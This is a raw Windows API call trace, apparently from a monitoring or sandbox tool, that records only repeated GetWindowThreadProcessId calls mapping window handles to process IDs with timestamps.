	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x8a8
	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xaf0
	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x88c
	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb04
	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x910
	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x230
	[0817.143] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xac0
	[0817.143] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xab4
	[0817.143] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xaac
	[0817.143] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x3d0
	[0817.143] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x978
	[0817.143] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa7c
	[0817.143] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x59c
	[0817.143] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa88
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa6c
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa68
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x9f8
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa04
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x924
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x8dc
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x7dc
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x768
	[0817.144] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x764
	[0817.145] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x820
	[0817.145] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x810
	[0817.145] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x794
	[0817.145] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x83c
	[0817.145] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x7ac
	[0817.145] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb44
	[0817.145] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x6bc
	[0817.145] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb5c
	[0817.146] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x838
	[0817.146] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.146] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.146] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.146] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.146] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.146] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.146] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0818.437] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.017] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x818
	[0820.853] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x5b8
	[0820.853] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x494
	[0820.854] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1ec
	[0820.854] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x440
	[0820.854] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x7e8
	[0820.854] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x730
	[0820.854] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x2c8
	[0820.854] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x31c
	[0820.854] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x330
	[0820.854] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x128
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x5c8
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x6f8
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x358
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x73c
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb0
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x250
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x240
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x790
	[0820.855] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x61c
	[0820.856] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x540
	[0820.856] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x538
	[0820.856] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x568
	[0820.856] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x538
	[0820.856] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x568
	[0820.856] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x538
	[0820.856] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x540
	[0820.856] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x540
	[0820.857] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x57c
	[0820.857] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x460
	[0820.857] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x554
	[0820.857] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.857] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x528
	[0820.857] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.857] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.857] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.858] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x79c
	[0820.858] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.858] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4e0
	[0820.858] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.858] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x460
	[0820.858] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x460
	[0820.858] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x44c
	[0820.858] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x778
	[0820.859] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x460
	[0820.859] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x558
	[0820.859] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.859] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0820.859] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x21b8
	[0820.859] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x21c0
	[0820.859] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x219c
	[0820.860] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x20f4
	[0820.860] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x20e4
	[0820.860] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x20e8
	[0820.860] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x20ec
	[0820.860] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x20f0
	[0820.860] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e34
	[0820.860] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc38
	[0820.860] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1fe4
	[0820.861] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1f10
	[0820.861] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1f0c
	[0820.861] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1f08
	[0820.861] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1ef0
	[0820.861] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1eec
	[0820.861] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1ee4
	[0820.861] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1ed8
	[0820.861] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1ed0
	[0820.862] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e8c
	[0820.862] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e88
	[0820.862] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e84
	[0820.862] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1604
	[0820.862] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c2c
	[0820.862] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c08
	[0820.862] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c0c
	[0820.862] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c10
	[0820.863] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c14
	[0820.863] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c18
	[0820.863] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c1c
	[0820.863] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16fc
	[0820.863] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e78
	[0820.863] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c20
	[0820.863] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x191c
	[0820.863] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1748
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1bb4
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10bc
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b50
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x14b4
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x149c
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x14a8
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1490
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x14a4
	[0820.864] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x148c
	[0820.865] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1458
	[0820.865] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b4c
	[0820.865] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b3c
	[0820.865] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x19bc
	[0820.865] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x199c
	[0820.865] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1998
	[0820.865] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1994
	[0820.865] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1990
	[0820.866] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1984
	[0820.866] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x197c
	[0820.866] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1978
	[0820.866] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1824
	[0820.866] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1088
	[0820.866] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1908
	[0820.866] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x18cc
	[0820.866] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x18d0
	[0820.867] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1840
	[0820.867] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10c4
	[0820.867] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x128c
	[0820.867] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16e8
	[0820.867] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16cc
	[0820.867] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x274
	[0820.867] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10e0
	[0820.867] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10cc
	[0820.868] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10c0
	[0820.868] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10d0
	[0820.868] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1198
	[0820.868] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1080
	[0820.868] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1074
	[0820.868] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x106c
	[0820.868] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1474
	[0820.868] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1414
	[0820.869] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xbd0
	[0820.869] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x550
	[0820.869] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa38
	[0820.869] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16d0
	[0820.869] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16d4
	[0820.869] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x15bc
	[0820.869] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x15a0
	[0820.869] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x159c
	[0820.870] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1598
	[0820.870] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1594
	[0820.870] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1590
	[0820.870] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x158c
	[0820.870] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1588
	[0820.870] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1584
	[0820.870] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1580
	[0820.870] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x157c
	[0820.871] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1488
	[0820.871] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1404
	[0820.871] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x11b8
	[0820.871] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xbd4
	[0820.871] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe0c
	[0820.871] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xd30
	[0820.871] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe70
	[0820.871] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x13b8
	[0820.872] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe20
	[0820.872] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe2c
	[0820.872] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe00
	[0820.872] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe04
	[0820.872] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc94
	[0820.872] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x13b0
	[0820.872] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x13ac
	[0820.872] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x13a8
	[0820.873] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1374
	[0820.873] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x132c
	[0820.873] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1328
	[0820.873] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x12d0
	[0820.873] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x12cc
	[0820.873] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x12c8
